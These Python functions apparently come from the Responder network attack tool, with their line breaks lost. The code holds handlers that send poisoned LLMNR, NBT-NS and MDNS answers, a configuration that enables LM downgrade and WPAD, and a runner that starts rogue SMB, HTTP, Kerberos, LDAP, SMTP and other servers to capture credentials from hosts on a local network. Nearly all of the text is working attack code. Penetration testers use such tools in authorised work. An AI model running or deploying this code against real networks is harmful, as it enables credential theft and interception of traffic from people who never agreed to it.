def handle(self): MADDR = "224.0.0.251" MPORT = 5353 data, soc = self.request Request_Name = Parse_MDNS_Name(data) # Break out if we don't want to respond to this host if (not Request_Name) or (utils.RespondToThisHost( self.client_address[0], Request_Name) is not True): return None if responder_settings.Config.AnalyzeMode: # Analyze Mode if utils.Parse_IPV6_Addr(data): print utils.text( '[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (utils.color(self.client_address[0], 3), utils.color(Request_Name, 3))) else: # Poisoning Mode if utils.Parse_IPV6_Addr(data): Poisoned_Name = Poisoned_MDNS_Name(data) Buffer = MDNS_Ans(AnswerName=Poisoned_Name, IP=socket.inet_aton( responder_settings.Config.Bind_To)) Buffer.calculate() soc.sendto(str(Buffer), (MADDR, MPORT)) print utils.color( '[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
def serve_thread_tcp(host, port, handler): try: if utils.OsInterfaceIsSupported(): server = ThreadingTCPServer((responder_settings.Config.Bind_To, port), handler) server.serve_forever() else: server = ThreadingTCPServer((host, port), handler) server.serve_forever() except: print utils.color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_SSL(host, port, handler): try: cert = os.path.join(responder_settings.Config.ResponderPATH, responder_settings.Config.SSLCert) key = os.path.join(responder_settings.Config.ResponderPATH, responder_settings.Config.SSLKey) if utils.OsInterfaceIsSupported(): server = ThreadingTCPServer((responder_settings.Config.Bind_To, port), handler) server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True) server.serve_forever() else: server = ThreadingTCPServer((host, port), handler) server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True) server.serve_forever() except: print utils.color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
def handle(self): data, socket = self.request Name = utils.Decode_Name(data[13:45]) # Break out if we don't want to respond to this host if utils.RespondToThisHost(self.client_address[0], Name) is not True: return None if data[2:4] == "\x01\x10": Finger = None if responder_settings.Config.Finger_On_Off: Finger = fingerprint.RunSmbFinger( (self.client_address[0], 445)) if responder_settings.Config.AnalyzeMode: # Analyze Mode LineHeader = "[Analyze mode: NBT-NS]" print( utils.color( "%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)) else: # Poisoning Mode Buffer = NBT_Ans() Buffer.calculate(data) socket.sendto(str(Buffer), self.client_address) LineHeader = "[*] [NBT-NS]" print( utils.color( "%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, utils.NBT_NS_Role(data[43:46])), 2, 1)) if Finger is not None: print( utils.text("[FINGER] OS Version : %s" % utils.color(Finger[0], 3))) print( utils.text("[FINGER] Client Version : %s" % utils.color(Finger[1], 3)))
def handle(self): data, soc = self.request Name = Parse_LLMNR_Name(data) # Break out if we don't want to respond to this host if utils.RespondToThisHost(self.client_address[0], Name) is not True: return None if data[2:4] == "\x00\x00" and utils.Parse_IPV6_Addr(data): Finger = None if responder_settings.Config.Finger_On_Off: Finger = fingerprint.RunSmbFinger( (self.client_address[0], 445)) if responder_settings.Config.AnalyzeMode: LineHeader = "[Analyze mode: LLMNR]" print utils.color( "%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) else: # Poisoning Mode Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name) Buffer.calculate() soc.sendto(str(Buffer), self.client_address) LineHeader = "[*] [LLMNR]" print utils.color( "%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1) if Finger is not None: print utils.text("[FINGER] OS Version : %s" % utils.color(Finger[0], 3)) print utils.text("[FINGER] Client Version : %s" % utils.color(Finger[1], 3))
def IsICMPRedirectPlausible(IP): dnsip = [] for line in file('/etc/resolv.conf', 'r'): ip = line.split() if len(ip) < 2: continue elif ip[0] == 'nameserver': dnsip.extend(ip[1:]) for x in dnsip: if x != "127.0.0.1" and utils.IsOnTheSameSubnet(x, IP) is False: print( utils.color( "[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)) print( utils.color( "[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)) print( utils.color( "[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
def configure(self, interface=None): assert interface is not None responder_configs = {} responder_configs['interface'] = interface responder_configs['responder'] = {} responder_configs['responder']['lm_downgrade'] = True responder_configs['responder']['wpad'] = True responder_configs['responder']['w_redirect'] = True responder_configs['responder']['nbtns_domain'] = False responder_configs['responder']['basic_auth'] = False responder_configs['responder']['fingerprint'] = False responder_configs['responder']['ourip'] = None responder_configs['responder']['force_wpad_auth'] = False responder_configs['responder']['upstream_proxy'] = None responder_configs['responder']['analyze'] = False responder_configs['responder']['verbose'] = False if not os.geteuid() == 0: print utils.color("[!] Responder must be run as root.") sys.exit(-1) elif responder_configs['responder']['ourip'] is None and utils.IsOsX() is True: print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n" parser.print_help() exit(-1) responder_settings.init() responder_settings.Config.populate(responder_configs) utils.StartupMessage() responder_settings.Config.ExpandIPRanges() if responder_settings.Config.AnalyzeMode: print utils.color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
def serve_MDNS_poisoner(host, port, handler): try: server = ThreadingUDPMDNSServer((host, port), handler) server.serve_forever() except: print utils.color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_udp_broadcast(host, port, handler): try: server = ThreadingUDPServer(('', port), handler) server.serve_forever() except: print utils.color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def run_responder(): try: threads = [] # Load (M)DNS, NBNS and LLMNR Poisoners from core.poisoners.LLMNR import LLMNR from core.poisoners.NBTNS import NBTNS from core.poisoners.MDNS import MDNS threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,))) threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,))) threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,))) # Load Browser Listener from core.servers.Browser import Browser threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,))) if responder_settings.Config.HTTP_On_Off: from core.servers.HTTP import HTTP threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,))) if responder_settings.Config.SSL_On_Off: from core.servers.HTTP import HTTPS threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,))) if responder_settings.Config.WPAD_On_Off: from core.servers.HTTP_Proxy import HTTP_Proxy threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,))) if responder_settings.Config.SMB_On_Off: if responder_settings.Config.LM_On_Off: from core.servers.SMB import SMB1LM threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,))) threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,))) else: from core.servers.SMB import SMB1 threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,))) threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,))) if responder_settings.Config.Krb_On_Off: from core.servers.Kerberos import KerbTCP, KerbUDP threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,))) threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,))) if responder_settings.Config.SQL_On_Off: from core.servers.MSSQL import MSSQL threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,))) if responder_settings.Config.FTP_On_Off: from core.servers.FTP import FTP threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,))) if responder_settings.Config.POP_On_Off: from core.servers.POP3 import POP3 threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,))) if responder_settings.Config.LDAP_On_Off: from core.servers.LDAP import LDAP threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,))) if responder_settings.Config.SMTP_On_Off: from core.servers.SMTP import ESMTP threads.append(Thread(target=serve_thread_tcp, args=('', 25, ESMTP,))) threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,))) if responder_settings.Config.IMAP_On_Off: from core.servers.IMAP import IMAP threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,))) if responder_settings.Config.DNS_On_Off: from core.servers.DNS import DNS, DNSTCP threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,))) threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,))) for thread in threads: thread.setDaemon(True) thread.start() print utils.color('[+]', 2, 1) + " Listening for events..." while True: time.sleep(1) except KeyboardInterrupt: sys.exit("\r%s Exiting..." % utils.color('[+]', 2, 1))